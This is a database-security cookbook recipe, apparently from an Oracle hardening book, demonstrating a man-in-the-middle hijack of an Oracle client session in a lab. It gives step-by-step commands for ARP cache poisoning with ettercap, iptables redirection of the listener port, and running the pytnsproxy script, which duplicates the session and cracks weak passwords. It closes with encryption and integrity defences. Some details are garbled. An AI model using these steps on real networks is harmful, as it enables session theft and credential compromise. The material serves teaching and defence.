Hijacking an Oracle connection

This connection hijacking scenario and the proxy program used were developed by Laszlo Toth and presented at Hackactivity 2009 (http://soonerorlater.hu/index.khtml?article_id=514).The flash presentation can be viewed at http://soonerorlater.hu/flash/pytnsproxy_1.htm.

This is a classic scenario and example of a man in the middle (MITM) attack in which an interposed attacker hijacks a client connection.

For this scenario we will use three hosts: database server (noderorcl1), Oracle client (nodeorcl5), and attacker host (mitmattack). The scenario will be performed using Oracle Enterprise Edition on all hosts. The attacker host will be configured on a virtual machine running Fedora 11 x 84 (Leonidas # 1 SMP Wed May 27 17:27:08 EDT 2009 x86_64 x86_64 x86_64 GNU / Linux). The setting up and configuration of the attacker host, mitmattack, will be covered in this recipe.

Getting ready

Download and install Oracle Enterprise Edition version in a separate home on nodeorcl1 and create a database named ORCL. Also download and install Oracle Client version on nodeorcl5 and mitmattack using Custom option (check everything).

To compile and build a proxy named pytnproxy we will need to download, build, and install on mitmattack the following libraries and utilities:

  • boost 1.37
  • bitstring-0.5.2
  • configobj-4.6.0
  • openssl-1.0.0
  • libnet-
  • libpcap-1.2.1
  • ettercap

Libnet and libcap are required for compiling and building ettercap.

How to do it...

  1. Disable SElinux on all hosts. Edit /etc/selinux/config and set the SELINUX configuration parameter to disabled as follows:
  2. On the attacker host flush the current iptables configuration as follows:
    [root@mitmattack openssl-1.0.0h]# iptables --flush
  3. Next, save the flushed iptables configuration as follows:
    [root@mitmattack openssl-1.0.0h]# service iptables save
    iptables: Saving firewall rules to /etc/sysconfig/iptables:[  OK  ]
    [root@mitmattack openssl-1.0.0h]#
  4. The pytnproxy script has AES decryption capabilities built-in, provided by a library called aesdecrypt. To compile and link aesdecrypt.cpp on 64 bit systems you need to modify the CFLAGS from Makefile as follows:
    CFAGS = -Wall -O3 -shared –fPIC
  5. Next, build aesdecrypt as follows:
    [root@mitmattack pythonproxy_0.1]# make 
    gcc -Wall -O3 -shared -fPIC -I /usr/include/python2.6/ -c aesdecrypt.cpp
    aesdecrypt.cpp: In function 'int<unnamed>::HexStringtoBinArray(const char*, unsigned char*)':
    aesdecrypt.cpp:209: warning: comparison between signed and unsigned integer expressions
    gcc -Wall -O3 -shared -fPIC -I /usr/include/python2.6/ -o aesdecrypt.so aesdecrypt.o -lcrypto -lpython2.6 -lboost_python-mt
    [root@mitmattack pythonproxy_0.1]#
  6. Configure iptables rules as described in the iptables.txt file located within the pythonproxy_0.1 directory:
    [oracle@mitmattack pythonproxy_0.1]$ iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 1521 -j REDIRECT --to-port 2521
  7. Verify the iptables rules; you should see the following:
    [root@mitmattack ~]# iptables --list
    Chain INPUT (policy ACCEPT)
    target     prot opt source               destination         
    Chain FORWARD (policy ACCEPT)
    target     prot opt source               destination         
    Chain OUTPUT (policy ACCEPT)
    target     prot opt source               destination
  8. Save the iptables rules as follows:
    [root@mitmattack ~]# iptables-save
    # Generated by iptables-save v1.4.3.1 on Sat May 12 18:31:10 2012
    :OUTPUT ACCEPT [0:0]
    -A PREROUTING -i eth0 -p tcp -m tcp --dport 1521 -j REDIRECT --to-ports 2521 
    # Completed on Sat May 12 18:31:10 2012
    # Generated by iptables-save v1.4.3.1 on Sat May 12 18:31:10 2012
    :INPUT ACCEPT [214:66820]
    :OUTPUT ACCEPT [23:3892]
    # Completed on Sat May 12 18:31:10 2012
  9. On nodeorcl5 configure a net service named ORCL as follows:
    ORCL =
        (ADDRESS_LIST =
          (ADDRESS = (PROTOCOL = TCP)(HOST = nodeorcl1)(PORT = 1521))
        (CONNECT_DATA =
          (SERVICE_NAME = ORCL)
  10. On orclclient start Oracle SQL Developer (start script/executable located in $ORACLE_HOME/sqldeveloper/sqldeveloper.sh) and set up a new connection using the Network Alias option as follows:
    How to do it...
  11. Next, configure pytnproxy for connection hijacking. Open ptny_cfg.cfg with vi or your preferred editor. There are a couple of options, but for this step you just need to configure the listening port (LstPort=2521), server host (SrvHost=, and hijack port (AttPort=1522):
    How to do it...
  12. On the attacker host open SQL Developer and set up a special connection named hijackedconn using Basic Connection type, port 1522 configured in the previous step as hijacking port and type proxytest for the username and password as follows:
    How to do it...
  13. At this step we should be ready to start a hijacking session. First, start ARP cache poisoning with ettercap as the user root by using the following options (use your own IP addresses if they are different ):
    [root@mitmattack ~]# ettercap -T -M arp / /
    ettercap copyright 2001-2011 ALoR & NaGA
    Listening on eth0... (Ethernet)
      eth0 ->	08:00:27:90:A3:67
    SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
    Privileges dropped to UID 65534 GID 65534...
       0 plugins (disabled by configure...)
      40 protocol dissectors
      55 ports monitored
    7587 mac vendor fingerprint
    1766 tcp OS fingerprint
    2183 known services
    Scanning for merged targets (2 hosts)...
    * |==================================================>| 100.00 %
    2 hosts added to the hosts list...
    ARP poisoning victims:
     GROUP 1 : 08:00:27:1B:28:54
     GROUP 2 : 08:00:27:FB:D0:95
    Starting Unified sniffing...
  14. Next, start the proxy script pytnproxy.py as follows:
    [root@mitmattack pythonproxy_0.1]# python pytnsproxy.py 
  15. On the client host connect to the ORCL database as the system user, as follows:
    How to do it...
  16. Open the terminal where the pytnsproxy script was launched. At this stage you should see something similar as the following listing:
    [root@mitmattack pythonproxy_0.1]# python pytnsproxy.py connected:
  17. The ettercap tool is also an excellent sniffer. At this moment you should see the packet traffic and contents in the terminal where ettercap was started:
    Ettercap will list at May 12 18:51:27 2012
    TCP□o□ --> | AP
    .h..........V...K..Y......b.xp...1..(..M.....(......i..(.  .    PRIVILEGE......xp...4......
    ......... ..................
    Sat May 12 18:51:27 2012
    TCP□o□ --> | AP
  18. Next, on the client side (nodeorcl5) disconnect from the ORCL database server.
  19. In this moment the connection should be hijacked. In the pytnsproxy output you should see the following :
    [root@mitmattack pythonproxy_0.1]# python pytnsproxy.py connected:
    New hijack thread started, waiting for connection on port 1522!
    Use Java client to connect to the hijack thread!!!!
    The server version is Linux!
  20. On the attacker host, connect with the proxytest user using the proxytest password. Once connected, if we issue select username, machine, logon_time, terminal from v$session, the result indicates that we are connecting from nodeorcl5, and the LOGON_TIME is identical to the client's logon time:
    How to do it...


On Fedora 64 you may face the following error message after you launch the installer with runInstaller:

/orakit/client/install/unzip: /lib/ld-linux.so.2: bad ELF interpreter: No such file or directory issue during Oracle Client install:

To correct this issue install the following 32-bit libraries as follows:

[root@mitmattack kit]#  yum install install bc libc.so.6 libaio.so.1 gcc libaio compat-libstdc++-33

How it works...

As we have seen in the scenario presented here, it takes place in three stages: ARP cache poisoning, client connection redirection through the proxy, and connection or socket duplication on a separate port. All these stages need some explanation to understand the mechanisms used.

The first stage of a connection hijacking MITM attack is the initiation of ARP cache poisoning.

ARP is an abbreviation for Address Resolution Protocol. Each host in the network has an IP address and an associated MAC address derived from its network card. ARP practically binds the IP address with a corresponding MAC address and stores it in an ARP table. All network devices have an ARP table and a list of all the IP addresses and MAC addresses the device has already matched together with.

The main scope of this table is that the device does not need to repeat the request for devices it has already communicated to, and this can improve communication speed by reducing unnecessary overheads.

ARP protocol has practically four stages:

  1. The first stage is an ARP Request.
  2. The computer that initiates the connection queries the network for IP address.
  3. The next step consists of an ARP Reply. At this stage if the computer exists in the network, it responds with the IP and MAC address association.
  4. In the final stage the correspondent MAC address is added to the ARP table. Also, there is a reverse ARP Request. The difference is that the computer queries the network for a MAC address instead of an IP address and the response is the corresponding IP address.

The mechanism used in cache poisoning is to fake and replace the MAC address. As in our preceding example, by using ettercap we practically faked the MAC address of the attacker host (mitmattack) and associated the client computer (nodeorcl5) MAC address to its IP address and put this host first in the ARP table. In this way the Oracle server responded first to the client connection request of the attacker's proxy. Next, the proxy using the defined iptable forwarding rules forwarded the connection to the client.

When the client disconnected, the proxy practically duplicates the connection socket and starts to listen on the configured hijacking port (1522) and allows local clients to connect with the proxytest credentials.

There's more...

The best method of protection against MITM attacks is to encrypt the network communication by using hardware or software solutions. In this chapter we will cover the some of the major software solutions applicable to Oracle network communication such as Oracle Advanced Security (OAS) encryption, OAS SSL, IPSEC, stunnel (SSL tunneling), and SSH tunneling. Network encryption is presented and recommended as a very effective defence method also against the notorious TNS poison attack (security issue CVE-2012-1675) . TNS poison attack is classified as a man-in-the-middle-type attack, more about TNS Poison attack can be found at www.joxeankoret.com/download/tnspoison.pdf.

Also a separate method of protection against MITM attacks is to configure connection integrity with hash functions such as SHA1 and MD5. It is an additional method of protection used usually in conjunction with network encryption. In general it protects against replay type attacks with crafted packets. For example, an attacker sends network packets to a database containing the same query several times to modify or retrieve the data. As we will see using only data integrity with SHA1 without without encryption we will be able to block the MITM attack.

The pytnproxy script developed by Laszlo also has other features, such as a connection downgrade to Oracle 10g combined with online password decryption. Connection downgrading is used to force Oracle to use 10g type authentication. This exploits a feature that Oracle 11g has and preserves backward compatibility with Oracle 10g client versions. As mentioned before, pytnproxy has a built in password cracker provided by aesdecrypt library that is able to crack weak passwords on-the-fly. To protect against connection downgrading set sqlnet parameter SQLNET.ALLOWED_LOGON_VERISION to 11. For more details related to pytnproxy check out his site at http://www.soonerorlater.hu/index.khtml?article_id=515.

See also...

  • The Using OAS Network Encryption for securing data in motion recipe
  • The Using OAS Data Integrity for securing data in motion recipe
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